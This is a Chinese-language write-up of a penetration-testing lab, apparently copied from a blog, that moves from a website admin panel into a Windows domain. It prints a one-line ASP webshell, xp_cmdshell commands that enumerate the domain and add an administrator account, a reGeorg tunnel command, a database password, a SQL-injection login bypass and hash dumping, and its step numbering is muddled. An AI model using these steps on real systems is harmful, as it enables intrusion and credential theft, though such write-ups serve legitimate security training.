0x00 實驗目的
拿到域環境下其他主機的網站源碼
0x01 滲透思路
通過拿到網站shell滲透到內網,由內網存活主機拿到域控權限,再由域控滲透到其他域里面得主機獲取資源。
0x02 實驗過程
訪問目標網站IP發現是一個靜態網站,發現網站前台無法利用,嘗試爆破一下網站后台
利用御劍掃描后台沒有發現后台登錄界面,但發現了robots.txt文件,查看robots.txt發現里面有網站后台目錄
訪問網站后台頁面
嘗試使用burp暴力破解,發現成功爆破出網站后台管理員賬號密碼為admin/passw0rd
利用爆破出來的管理員賬號密碼成功登錄到網站后台(PS:登錄的時候選擇全功能登錄)
發現在界面風格>模板選擇處可以修改模板文件夾名,我們將模板文件夾名修改成1.asp,嘗試利用IIS解析漏洞
然后在界面風格>編輯模板/css文件>添加模板處將aspx一句話木馬添加成html文件
利用菜刀成功連接到我們寫入的一句話木馬
利用一句話木馬上傳一個aspx的大馬上去,方便操作
查看發現該主機是雙網卡,得到兩個內網IP段
查看該主機緩存信息發現幾個內網IP
查看發現192.168.152.173開啟了1433端口,我們推測其可能是一台數據服務器
查看網站配置文件發現數據庫賬號密碼
利用aspx大馬成功登錄到數據庫,並且發現是system權限
查看域里所有用戶名
查詢域組名稱
查看當前域中的計算機列表
查詢域管理員
利用數據庫shell添加一個賬號,並將其加入到管理員組
還發現192.168.152.173開啟了3389端口
利用reGeorg+Proxifier設置代理嘗試遠程登錄
利用前面我們添加的管理員賬號密碼成功登錄遠程桌面,在登錄的時候配置選項,將本地工具文件夾掛載到目標機
成功登錄到遠程桌面
利用文件共享上傳一個QuarksPwDump.exe,然后使用QuarksPwDump.exe抓取一下系統管理員密碼hash並導出到一個txt文件里
利用MD5發現解不開
我們知道域里面的主機都是有一定的命名規則的,查看獲得shell的網站發現他的網站根目錄的命名為game.fbi.gov.us,通過手動測試發現一個域名為oa.fbi.gov.us的網站
訪問我們oa.fbi.gov.us域名發現是一個源碼庫日志管理系統
嘗試利用asp萬能密碼繞過登陸,賬號:liufeng’ or ‘1’='1密碼任意,成功登錄到后台
在添加日志處發現存在存儲型xss
點進我們添加的日志查看一下屬性,發現添加的日志的URL
測試一下得到的URL是否存在注入,發現報500錯誤
我們利用啊D注入工具登錄到網站后台
然后嘗試注入該URL發現成功注出管理員密碼,username不知道什么原因沒跑出來,不過問題不大,上面我們已經得到了幾個用戶名,也不多,可以一個一個嘗試
利用我們前面的到的用戶名和密碼嘗試登錄域里面得其他主機
成功登錄到其他主機,然后我們就可以查看下載域里面其他PC端的文件了
0x03 總結
1.訪問目標網站IP發現是一個靜態網站,發現網站前台無法利用,通過御劍目錄掃描工具對其目錄掃描,發現存在robots.txt,訪問robots.txt,存在admin目錄2.訪問admin目錄發現是網站后台頁面,雖然后台有驗證碼,但是驗證碼超時時間長,可通過bp對其進行爆破,成功爆破出用戶名和密碼為admin/passw0rd
http://39.106.226.95:9235/admin
3.通過namp掃描目標網站IP,發現系統是windows iis6.0,且開通了80端口
14.發現在界面風格>模板選擇處可修改模板文件夾名,模板名修改為1.asp
15.然后在界面風格>編輯模板/css文件>添加模板處添加的模板名1.html,且內容為asp的一句話
<%eavl request("pass")%>
16.通過菜刀成功連接一句話,然后通過菜刀上傳ASPX大馬上去。
17.通過aspx大馬的命令執行,查看網卡IP地址,發現存在2個網卡,一個網卡IP地址192.168.152.182,另外一個網卡為192.168.79.128
cmdpath:
c:\windows\system32\cmd.exe
argument:
/c ipconfig
18.查看該主機緩存信息發現幾個內網IP(192.168.152.182,192.168.152.173,192.168.152.180)
cmdpath:
c:\windows\system32\cmd.exe
argument:
/c arp -a
19.利用aspx大馬的portscan功能,查看發現192.168.152.173開啟了1433和3389端口
20.查看到網站配置文件發現數據庫賬號密碼
21.利用aspx大馬的數據庫功能成功登錄到數據庫,並且發現是system權限
connstring:
server=192.168.152.173;UID=sa;PWD=piy88PRO*JNJ24e3;database=master;provider=SQLOLEDB
SQLEXEC: XP_cmdshell_exec
run sql:
Exec master.dbo,xp_cmdshell 'whoami'
22.查詢域內所有用戶名
SQLEXEC: XP_cmdshell_exec
run sql:
Exec master.dbo,xp_cmdshell 'dequery user'
23.查詢域組名稱
SQLEXEC: XP_cmdshell_exec
run sql:
Exec master.dbo,xp_cmdshell 'net group /domain'
24.查看當前域中的計算機列表,發現存在web-server,file-server,db-server等主機名
SQLEXEC: XP_cmdshell_exec
run sql:
Exec master.dbo,xp_cmdshell 'net view'
25.查詢域管理員,為administrator用戶
SQLEXEC: XP_cmdshell_exec
run sql:
Exec master.dbo,xp_cmdshell 'net group "domain admin" /domain'
26.利用數據庫shell添加一個賬號,並將其加入到管理員組
Exec master.dbo,xp_cmdshell 'net user ddd password#111 /add'
Exec master.dbo,xp_cmdshell 'net localgroup administrators ddd /add'
13.將reGeorgSocksProxy的aspx腳本文件通過aspx大馬上傳到目標系統中(39.106.226.95),並訪問鏈接
http://39.106.226.95:9235/tunnel.aspx
14.配置好后通過reGeory來打通本地和目標的通道,在攻擊機下執行
python reGeorgSocksProxy.py -p 8888 -l 0.0.0.0 -u http://39.106.226.95:9235/tunnel.aspx
15.在proxifier上設置socks4代理,添加代理
socks4 127.0.0.1 8888
16.通過proxifier加載mstsc進行遠程桌面登錄192.168.152.173,在遠程登錄的時候配置選項,將本地工具文件夾掛載到目標機
17.利用文件共享上傳一個QuarksPwDump.exe,然后使用QuarksPwDump.exe抓取一下系統管理員密碼hash並導出到一個txt文件里,發現MD5無法解開
18.在網站根目錄下還存在另一個目錄為oa.fbi.gov.us。那么直接訪問這個目錄命令作為網站域名訪問,發現是一個源碼庫日志管理系統
19.嘗試利用asp萬能密碼繞過登陸,賬號:admin’ or ‘1’='1密碼任意,成功登錄到后台
20.發現后台添加日志處又存在存儲型xss
21.點進添加的日志查看一下屬性,發現添加的日志的URL
http://oa.fbi.gov.us/logive.asp?id=394
22.利用啊D注入工具或者sqlmap工具成功注入出用戶名和密碼
23.嘗試用注入成功的用戶名和密碼可成功遠程桌面登錄。
原文鏈接:
https://blog.csdn.net/weixin_44991517/article/details/93896401
